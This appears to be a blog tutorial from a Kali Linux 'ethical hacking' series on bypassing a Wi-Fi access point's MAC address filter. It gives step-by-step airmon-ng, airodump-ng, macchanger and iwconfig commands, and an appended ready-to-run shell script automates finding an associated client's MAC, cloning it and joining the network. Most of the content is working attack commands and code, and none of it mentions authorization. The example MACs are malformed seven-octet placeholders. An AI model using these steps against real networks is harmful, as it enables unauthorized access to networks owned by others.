>> Welcome all, to this series of Kali Linux for Ethical Hacking. This is the third part, and I’ll explain the process of bypassing the MAC address filter on an AP (Access Point).
# 3 Basic Process:
– Finding the AP: airmon-ng & airodump-ng
– Finding a client associated with that AP: airodump-ng
– Finally, cloning that client’s MAC address with macchanger
# . . . Let’s Begin
– Before starting, make sure that eth0, lo and wlan0 are present. (Open a terminal and run ifconfig.)
– Let’s put the wireless interface into monitor mode.
Run:
airmon-ng start wlan0
– After executing the above command, we get a new interface, mon0, with monitor mode enabled. (Newer versions of aircrack-ng name this interface wlan0mon instead; use whichever name airmon-ng reports in place of mon0 below.)
– Verify that both interfaces are up and running,
Run:
airmon-ng
– You should see both wlan0 and mon0 listed. Next,
Run:
airodump-ng mon0
– This lists every AP the wireless card can hear, hopping across channels.
– In the output you’ll get each AP’s BSSID, ESSID, channel and cipher. If an AP hides its SSID, the ESSID column shows <length: 0> (or is blank).
Note: We saw in the second part how to uncover a hidden SSID. For this part you can use any open (unencrypted) SSID, or an SSID whose password you know.
– We will use the MAC address seen in part 2, i.e. 00:A1:B2:11:20:13:5T on channel 1, and assume its SSID is nhc-BJ and that MAC address filtering is enabled on it. (That value is only a placeholder from the earlier part; a real BSSID is six two-digit hexadecimal octets, exactly as airodump-ng prints it.)
– Now we find a client that is associated with this AP (nhc-BJ), together with its MAC address,
– so we can reuse that MAC to bypass the filter.
Run:
airodump-ng -c 1 -a --bssid 00:A1:B2:11:20:13:5T mon0
(-c locks airodump-ng to channel 1, the channel of the BSSID we’re trying to connect to, instead of hopping. -a filters out unassociated clients, so only stations actually associated with this BSSID are shown.)
– The STATION column now lists the MAC address of a client associated with that AP. (Let’s assume that MAC = 00:C1:52:11:20:13:7D; as above, a real one has six hex octets.)
– CTRL+C (press)
– Run:
macchanger --help
(Notice the -m option, which sets a specific MAC address.)
-Run:
macchanger -m 00:C1:52:11:20:13:7D wlan0
(macchanger cannot change the address of an interface that is up; if it reports “Device or resource busy”, take the interface down first, either with ifconfig wlan0 down or, to leave monitor mode at the same time, with:)
airmon-ng stop wlan0
– Run:
macchanger -m 00:C1:52:11:20:13:7D wlan0
(If successful, you’ll see a message like ‘faked MAC’)
-Run:
ifconfig wlan0 down
ifconfig wlan0 up
(Let’s see whether we can associate with the SSID now or not with this faked MAC)
– Run:
iwconfig wlan0 essid nhc-BJ channel 1
(If this does not work in your version of Kali, try the same command in BackTrack, or use an updated version of Kali.)
iwconfig wlan0
(If association succeeded, the “Access Point:” field shows the AP’s BSSID; if it still reads “Not-Associated”, the AP has not accepted the spoofed MAC. Note that iwconfig alone only joins open or WEP networks; for a WPA/WPA2 network with a known password you still need wpa_supplicant, but the cloned MAC is what gets you past the filter.)
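The whole procedure above, scripted, as an added example (this is not code from the original post). It assumes airodump-ng was run with -w capture, which writes the AP and station tables to capture-01.csv; the CSV sample embedded here is constructed for the demonstration with placeholder MACs, not a real capture. Parsing the station table picks out clients associated with the target BSSID, the MAC is validated before it is handed to macchanger (which would reject malformed values such as the seven-octet placeholders above), and the association check reads the “Access Point:” field from iwconfig. The parsing and checking functions run offline; spoof_and_join runs ifconfig, macchanger and iwconfig for real and needs root and a wireless interface.

```shell
#!/bin/sh
# Added example, not from the original post. Offline helpers for the
# MAC-filter bypass walk-through: find associated clients in airodump-ng's CSV
# output, validate a MAC before spoofing it, and read association state from
# iwconfig output. Only spoof_and_join touches real interfaces (needs root).

# valid_mac MAC -> succeeds only for six colon-separated hex octets
valid_mac() {
    printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# clients_for_bssid CSVFILE BSSID -> prints station MACs whose BSSID column
# matches. In airodump-ng's CSV the AP table comes first; the line starting
# "Station MAC" is the header of the station table, where column 6 is the AP
# the station is associated with (or "(not associated)").
clients_for_bssid() {
    awk -F',' -v want="$(printf '%s' "$2" | tr 'a-f' 'A-F')" '
        /^Station MAC/ { in_stations = 1; next }
        in_stations && NF >= 6 {
            mac = $1; ap = $6
            gsub(/^[ \t]+|[ \t]+$/, "", mac); gsub(/^[ \t]+|[ \t]+$/, "", ap)
            if (toupper(ap) == want) print mac
        }' "$1"
}

# assoc_bssid_from_iwconfig IWCONFIG_TEXT -> prints the value of the
# "Access Point:" field: the AP's BSSID when associated, else "Not-Associated".
assoc_bssid_from_iwconfig() {
    printf '%s\n' "$1" | sed -n 's/.*Access Point: *\([^ ]*\).*/\1/p' | head -n 1
}

# spoof_and_join IFACE CLIENT_MAC ESSID CHANNEL -> the manual steps from the
# post. The interface must be down before macchanger will change it
# ("Device or resource busy" otherwise). Prints the association result.
spoof_and_join() {
    iface=$1; mac=$2; essid=$3; chan=$4
    valid_mac "$mac" || { echo "refusing to spoof malformed MAC: $mac" >&2; return 1; }
    ifconfig "$iface" down
    macchanger -m "$mac" "$iface"
    ifconfig "$iface" up
    iwconfig "$iface" essid "$essid" channel "$chan"
    sleep 3                      # give the card a moment to associate
    assoc_bssid_from_iwconfig "$(iwconfig "$iface" 2>/dev/null)"
}

# Constructed sample in airodump-ng's CSV layout (not a real capture; the
# MACs are placeholders). One client is associated with nhc-BJ, one is not.
sample_csv() {
    cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:A1:B2:11:20:13, 2015-03-01 10:00:00, 2015-03-01 10:05:00,  1,  54, OPN ,  ,   , -40,      100,        0,   0.  0.  0.  0,   6, nhc-BJ, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:C1:52:11:20:13, 2015-03-01 10:00:00, 2015-03-01 10:05:00, -50,      120, 00:A1:B2:11:20:13, nhc-BJ
00:C1:52:11:20:14, 2015-03-01 10:00:00, 2015-03-01 10:05:00, -70,       10, (not associated), Other-Net
EOF
}

# Usage, offline demo:   sh bypass.sh demo
# Usage, for real:       clients=$(clients_for_bssid capture-01.csv 00:A1:B2:11:20:13)
#                        spoof_and_join wlan0 "$(printf '%s\n' "$clients" | head -n 1)" nhc-BJ 1
if [ "${1:-}" = "demo" ]; then
    tmp=$(mktemp)
    sample_csv > "$tmp"
    echo "clients associated with 00:A1:B2:11:20:13:"
    clients_for_bssid "$tmp" 00:A1:B2:11:20:13
    rm -f "$tmp"
fi
```

The script deliberately selects only stations whose BSSID column equals the target: a station that merely probed for nhc-BJ is not on the AP’s allow-list, so cloning its MAC would not get past the filter.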